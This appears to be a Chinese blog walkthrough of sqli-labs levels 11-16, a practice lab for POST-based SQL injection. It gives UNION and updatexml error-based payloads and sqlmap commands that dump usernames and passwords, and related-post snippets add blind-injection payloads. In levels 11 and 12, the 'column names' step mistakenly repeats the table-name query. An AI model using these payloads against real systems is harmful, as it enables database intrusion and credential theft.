sqli-labs过关解析(11-16 附带源码解析)

原创 已于 2025-04-02 20:39:03 修改 · 1.6k 阅读 · 40 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #python

于 2024-12-03 16:46:05 首次发布

本篇文章我们要进行的是POST型的注入,我们之前进行渗透的都是GET型。在这里我们要简单的了解一下GET型与POST型的区别。

在这里我直接用最直观的方式让你了解他们之间的区别
(1)GET型请求:我们输入的参数会保留在浏览器中(1-10关参数都是GET型),下面是第六关的代码举例:在这里插入图片描述
在这里插入图片描述
在这里我们可以看到我们输入的参数直接显示在浏览器导航栏里了。

(2)POST型请求:以第十一关为例
在这里插入图片描述
在这里插入图片描述
我们在账号密码处输入参数后,点击submit后。可以发现页面刷新后导航栏并不显示我们输入的参数。利用BurpSuite抓包后我们才能够发现有关POST的参数:
在这里插入图片描述

小技巧: 因此在往后我们面对POST型注入时,我们可以直接用BurpSuite进行抓包然后注入。

文章目录

sqli-labs 第十一关

还是老样子,先看源码:
在这里插入图片描述
我们可以很容易看到uname和password都是POST型请求(第一反应用BurpSuite抓包),同时我们可以看到$sql语句使用 '闭合
在这里插入图片描述
鼠标右键后点击“Send to Repeater” ,然后再点击Send和Render后,即可加载我们刚看到的网页:
在这里插入图片描述
又因为我们代码中的uname和password并没有进行任何函数过滤,所以在结合发现的 '闭合,就可以很容易的构造注入语句:

我们首先试试有多少个回显位:
	1' order by 3 -- da   (后面的&password=...这些都被注释掉了)
						 // 显示 Unkonwn column '3' in 'order clause'
	1' order by 2 -- da  //页面什么都不显示,说明有2个回显位

记得在修改完语句后再次点击Send才会显示如下画面,不要傻傻的以为修改语句页面就可以自己变化:
在这里插入图片描述
在这里插入图片描述
说明有两个回显位;接下来就进行正常的sql语句注入即可:

显示数据库:
	-1' union select 1,database() -- da

在这里插入图片描述

列库名:
	-1' union select 1,group_concat(schema_name) from information_schema.schemata -- da

在这里插入图片描述

列表名:
	-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= database()) -- da

在这里插入图片描述

列名:
	-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= database()) -- da

在这里插入图片描述

最后,显示内容:
	-1' union select 1,group_concat(concat_ws(0x3a,username,password)) from security.users -- fa

在这里插入图片描述

sqli-labs 第十二关

话不多说,直接看源码:
在这里插入图片描述
一样的POST型请求,唯一的区别就是变成了 ") 闭合,其他步骤与上一关一样,直接上代码:

显示有多少个回显位:
	1") order by 1,2,3 -- da  // 显示 Unkonwn column '3' in 'order clause'
	1") order by 2 -- da  //页面什么都不显示,说明有2个回显位

显示数据库:
	-1") union select 1,database() -- da 

列库名:
	-1") union select 1,group_concat(schema_name) from information_schema.schemata -- da

列表名:
	-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= database()) -- da

列名:
	-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= database()) -- da

最后,显示内容:
	-1") union select 1,group_concat(concat_ws(0x3a,username,password)) from security.users -- fa

sqli-labs 第十三关

源码:
在这里插入图片描述
简单的 ') 闭合,但真的有这么简单吗?

显示有多少个回显位:
	1') order by 1,2,3 -- da  // 显示 Unkonwn column '3' in 'order clause'
	1') order by 2 -- da  //页面什么都不显示,说明有2个回显位

然后我们接着输入:

显示数据库:
	-1') union select 1,database() -- da

在这里插入图片描述
结果显示我们successfully,但是我们想要的数据呢? 所以我们再次回去查看源码:
在这里插入图片描述

往下翻我们可以发现,显示查询信息的语句被注释掉了,所以在成功后才会没有显示任何数据。但是我们可以发现还存在一个 mysql_error() 函数,所以我们还可以利用报错注入进行:

类似的情况可以查看sqli-labs 第五关的解析,这里我就不赘述了。

查询数据库:
	-1') union select updatexml(1,concat(0x7e,(select database()),0x7e),1) -- da

在这里插入图片描述

列库名:
	-1') and updatexml(1,concat(0x7e,(select(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) -- fda
	// 修改limit x,1 改变x的值即可得到所有的表名:

在这里插入图片描述
在这里插入图片描述
剩下的同理:

找列名:
	-1') and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database()  and table_name='users' limit 0,1),0x7e),1)  -- fda
	
显示数据:
	-1') and updatexml(1,concat(0x7e,(select concat_ws(0x3a,username,password) from security.users limit 0,1),0x7e),1)  -- fda

sqli-labs 第十四关

看源码:
在这里插入图片描述
在这里插入图片描述
类似的代码,一样的报错注入,不一样的不过是 " 闭合
直接上代码:

显示有多少个回显位:
	1" order by 1,2,3 -- da  // 显示 Unkonwn column '3' in 'order clause'
	1" order by 2 -- da  //页面什么都不显示,说明有2个回显位

查询数据库:
	-1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1) -- da

列库名:
	-1" and updatexml(1,concat(0x7e,(select(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) -- fda

找列名:
	-1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database()  and table_name='users' limit 0,1),0x7e),1)  -- fda
	
显示数据:
	-1" and updatexml(1,concat(0x7e,(select concat_ws(0x3a,username,password) from security.users limit 0,1),0x7e),1)  -- fda

sqli-labs 第十五关

首先我们查看源码:
在这里插入图片描述
在这里插入图片描述
发现竟然连报错注入都没有了(悲),所以我们只能进行盲注了。
一般盲注的步骤sqli-labs 7~10关里讲过,我推荐的是通过sqlmap进行注入,但是与GET型不一样的是:

sqlmap.py sqlmap -r "C:\Users\Leco\Desktop\1.txt" -p n --dbs

其中文件1.txt是我们用BurpSuite所抓取的POST报文信息,后面的是报文在你电脑上的路径
在这里插入图片描述
我们在抓包后所显示的第一个页面,再将如图中的信息->复制保存到一个.txt文件即可。
在这里插入图片描述
图中显示部分即为所搜索到的数据库名:
在这里插入图片描述
剩下搜寻表名,列名的同理。我在这里就不演示了,直接给各位上代码:

//表名:
	sqlmap.py sqlmap -r "C:\Users\Leco\Desktop\1.txt" --batch -D security --tables

//列名
	sqlmap.py sqlmap -r "C:\Users\Leco\Desktop\1.txt" --batch -D security -T users --columns

//获取内容:
	sqlmap.py sqlmap -r "C:\Users\Leco\Desktop\1.txt" --batch -D security -T users -C username,password --dump

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
太长了,就不等他内容全部显示出来了。因为我要去吃饭)

sqli-labs 第十六关

看源码:
在这里插入图片描述
我们可以发现与第15关代码没有什么太大区别,只不过是变成了 ") 闭合,对手工注入有效(但是对于我们用sqlmap的来说没有任何影响)。
其他不变,还是用sqlmap:

//数据库
sqlmap.py sqlmap -r "C:\Users\Leco\Desktop\1.txt" -p n --dbs

//表名:
	sqlmap.py sqlmap -r "C:\Users\Leco\Desktop\1.txt" --batch -D security --tables

//列名
	sqlmap.py sqlmap -r "C:\Users\Leco\Desktop\1.txt" --batch -D security -T users --columns

//获取内容:
	sqlmap.py sqlmap -r "C:\Users\Leco\Desktop\1.txt" --batch -D security -T users -C username,password --dump

甚至于代码都是一样的(记得你抓的包是从16关抓的就行)。

注意

但是对于11-14关来说,我们也可以不用BurpSuite来进行注入,我们可以直接在password的框内来输入我们的语句,可以参考一下这篇文章

总结

这几关其实就是前面1-10关的所有注入技巧的整合,只不过由GET型变成了POST型罢了。多吸收,多思考,多学习别人的经验。

sqli-labs靶场11-17关(POST型)
bunengyongzho666的博客
05-05 982
uname=admin' and if((substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1)='s'),sleep(5),1)#爆字段。uname=admin&passwd=123' and updatexml(1,concat(0x7e,(database()),0x7e),1)#——爆数据库。
sqli-labs基础篇 第11~17关
Lucky小小吴的小屋
01-23 1520
sqli-labs基础篇 第11~17关
SQLI-labs-第十一关和第十二关
weixin_54055099的博客
04-28 1268
Sqli-labs的第11关和12关,有关POST方式的联合查询注入
sqli-labs靶场搭建(Windows环境)
你还心动吗
02-01 1374
sqli-labs是一个印度程序员写的一个关于SQL注入的靶场,一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过。
sqli-labs11-20关
永远相信美好的事情即将发生
12-15 4177
Less-11 进入后是个登录页面,应该是基于post的注入,这边准备用hackbar注入,方便一点。看一下源码,两个框的名字分别是uname和passwd 先提交1试试效果 登陆失败,再加一个单引号试试,密码框不输(若是输入密码,报错出来的信息更少;也可同时输入单双引号,这个效果一样) 有报错回显,存在注入,且回显的错误为:‘1’’ and password=’’ LIMIT 0,1。其中1’是我输进去的,另外还有成对的单引号出现,可以看出是字符型。由此猜测sql语句为:select usernam
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
最新发布
10-13
搭建sqli-labs靶场的过程相对简单。首先,用户需要准备一个包含Apache、MySQL和PHP的环境,例如使用wampserver或phpstudy等工具进行快速搭建。然后,将下载的sqli-labs-php7.zip解压到网站的根目录下,例如...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境,它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决,从而帮助学习者深入理解SQL注入的原理和防御技术。 与此同时,"phpStudy"是一个流行...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-book
03-26
sqli-labs-book
sqli-labs靶场通关攻略(11-15关)
Nai_zui_jiang的博客
08-19 696
进入网页在输入框输入 1' 发现会有报错因为这里是POST方式提交的,不能直接修改,这里有三种选择1、使用可以POST提交的插件,例如Firefox中的HackBar2、使用Burpsuite抓包后,然后修改3、直接在输入框中注入咱们使用手工输入,会发现username和password会回显1,2那么我们就可以通过这里来查询他的数据库了输入下面这条语句查询出数据库名security查询表名查询user里所有的列最后查询表格的所有数据。
sqli-labs靶场通关攻略 (十一到二十关)
2301_81881972的博客
08-19 1014
做到这一步的时候,发现在uname这个点注入是没有回显信息的,只显示了正常的数据。需要在passwd这点注入才会回显,因为我们在最后加入了注释符#,会把passwd这个字段的值給注释掉,导致没有数据的正常回显。开始有了输入框,试着随便输入账号密码,发现提示失败,同时网页上面的链接位置不在有输入参数的信息,这说明,传参的方式由GET改成了POST。说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'说明users表的第一个字段的第一位字符ascii码为105 'i'
sqli-labs-----11
wyzhxhn的博客
11-09 2429
基于错误的POST型单引号字符型注入
Sqli-labs搭建以及前五题通关
hpz3292887609的博客
01-27 1149
SQLI,我们称之为sql注入,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL ,Oracle以及Postgresql。Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。
SQL注入靶场sqli-labs(1-6)
m0_49025459的博客
05-09 838
Less-1(基于错误的GET单引号字符型注入) 我们直接看看源码弄明白什么是单引号字符型注入 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id']))//判断GET获取的id不能为空 { $id=$_GET['id'];//让id=我
sqllabs详解与知识点汇总(内含代码审计)
Samblue_M的博客
02-03 6072
sqllabs闯关记录 关于注释符的详解 SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com) HTTP请求方法------GET 对比 POST HTTP 方法:GET 对比 POST | 菜鸟教程 (runoob.com) 来自知乎的绕过 SQL注入:各种绕过检测的姿势 - 知乎 (zhihu.com) Less-1~4 @读题-------------get方式提交 @Error based—报错注入 @Single quo
Sqli-labs 查看源代码 21-30
foolisheddy
03-08 1153
Less-21 POST - cookie注入 - base46 编码 Less-22 POST - cookie注入 - base46 编码 Less-23 GET - 注释符绕过 Less-24 post - 二次注入 Less-25 GET - 绕过or 和 and - 字符型 Less-26 GET - 过滤空格 - 字符型 Less-27 GET - 过滤UNION和SELECT - 字符
python编写sqli-labs11关脚本
willow_liang的博客
11-03 372
关于sql时间盲注爆破数据库名 未使用二分法 import requests import datetime headers = { "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0" } def main(): database = "" for n in range(1,9): for i in rang
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值